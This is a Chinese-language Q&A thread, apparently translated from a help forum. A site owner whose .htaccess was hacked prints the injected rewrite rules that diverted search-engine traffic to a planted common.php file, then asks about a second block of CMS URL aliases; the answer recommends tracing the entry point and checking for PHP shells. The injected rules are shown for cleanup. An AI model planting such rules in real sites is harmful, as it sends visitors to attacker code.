htaccess 被黑了-我已删除代码和文件-下一步该怎么办?

htaccess 被黑了-我已删除代码和文件-下一步该怎么办?

可能重复:
我的服务器被黑了 紧急求助

我的网站最近被黑客入侵了。我想我已经找到了添加到 htaccess 文件的代码,删除了它,然后添加了脚本以防止再次访问 htaccess 文件。我还删除了被黑代码引用的 php 文件 (common.php)。接下来我需要做什么?我不是程序员或网站开发人员,但我真的想看看我是否可以自己解决这个问题,因为我花了好几个小时尝试并且不会轻易放弃。

这是我删除的被黑代码:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC] 
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f
RewriteRule ^.*$    /common.php [L]
</IfModule>

此代码必须保留在 htaccess 文件中,因为它将我的 url 重定向到 seo 友好的网站或网站错误,但此代码是否也被黑客入侵了?

# Apache search queries statistic module
RewriteEngine On
AddHandler php5-fastcgi .php .php5
# <contrexx>
#   <core_modules__alias>
    RewriteRule ^about-us$    /index.php?page=883 [L,NC]
    RewriteRule ^ausfluge-und-aktivitaten$    /index.php?page=800 [L,NC]
    RewriteRule ^bluestardive-news$    /index.php?page=919 [L,NC]
    RewriteRule ^bookings$    /index.php?page=911 [L,NC]
    RewriteRule ^diveresort$    /index.php?page=879 [L,NC]
    RewriteRule ^diving$    /index.php?page=880 [L,NC]
    RewriteRule ^excursions-and-activities$    /index.php?page=881 [L,NC]
    RewriteRule ^galerie$    /index.php?section=gallery [L,NC]
    RewriteRule ^oceannight$    http://www.bluestardive.com/index.php?page=906 [L,NC]
    RewriteRule ^philosophy$    /index.php?page=846 [L,NC]
    RewriteRule ^reservation$    /index.php?page=917 [L,NC]
    RewriteRule ^reservierung$    /index.php?page=918 [L,NC]
    RewriteRule ^resort$    /index.php?page=798 [L,NC]
#   </core_modules__alias>
# </contrexx>

答案1

在这种情况下,最好的办法是查明用户入口点并重复攻击 - 我无法告诉您是否在 .htaccess 中添加了任何可疑内容,因为我不知道 index.php 里面有什么。

如果 index.php 直接从数据库回显数据,那么他/她可能在数据库中添加了恶意代码,他/她可能在其他文件中创建了一些新的入口点(PHP Shell、漏洞)。

我强烈建议您与安全专家联系 - 如果没有,请彻底重新检查服务器上的每个文件,包括数据库条目。

确保弄清楚他的入口点是什么,以防止将来的攻击 - 如果您需要任何进一步的信息,您可以随时联系我。

相关内容